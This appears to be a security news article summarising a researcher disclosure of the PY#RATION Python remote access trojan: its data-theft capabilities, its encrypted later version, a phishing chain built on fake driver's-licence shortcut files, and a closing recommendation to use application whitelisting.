Researchers have disclosed a new attack campaign using a Python-based RAT. Dubbed PY#RATION, the attackers have been leveraging the RAT since August 2022, to gain control over compromised systems.
According to Securonix, the RAT has several capabilities that allow the harvesting of sensitive information.
PY#RATION can transfer files from the infected host machine to its C2 servers or vice versa.
It uses WebSockets to avoid detection and for C2 communication and exfiltration.
It further captures clipboard data, records keystrokes, checks for the presence of antivirus software, and executes system commands. Moreover, the RAT extracts passwords and cookies from web browsers.
PY#RATION functions as a pathway for deploying more malware, which in this campaign, included a Python-based info-stealer created to steal data from cryptocurrency wallets and web browsers.
Two versions (version 1.0 and 1.6) of the RAT have been detected, with the latter featuring anti-evasion techniques.
In the later version, nearly 1,000 lines of code have been added to support network scanning features to perform a reconnaissance of the compromised network.
Further, in this version, attackers hide the Python code behind an encryption layer using the fernet module.
The attack starts with a phishing email laden with a ZIP archive that comes with two shortcut (.LNK) files. These files masquerade as front/back side images of a U.K driver's license seem legitimate. The nature of the phishing lures indicates that the intended targets could be from the U.K or North America.
Opening each of the LNK files obtains two text files from a remote server subsequently renamed to BAT files. It runs stealthily in the background, while a decoy image is shown to the victim.
Further, another batch script is downloaded from a C2 server, designed to obtain additional payloads from the server, such as the Python binary (CortanaAssistance[.]exe).
The attackers use Cortana (a virtual assistant), which is an attempt to pass the malware as a system file.
The PY#RATION malware is developed using Python, allowing it to run on macOS, Linux, and Windows. Moreover, it uses several tactics such as fernet encryption to evade detection. These factors make it a versatile threat across multiple platforms. To protect from such threats, it is suggested to deploy an application whitelisting policy to stop the execution of unknown binaries.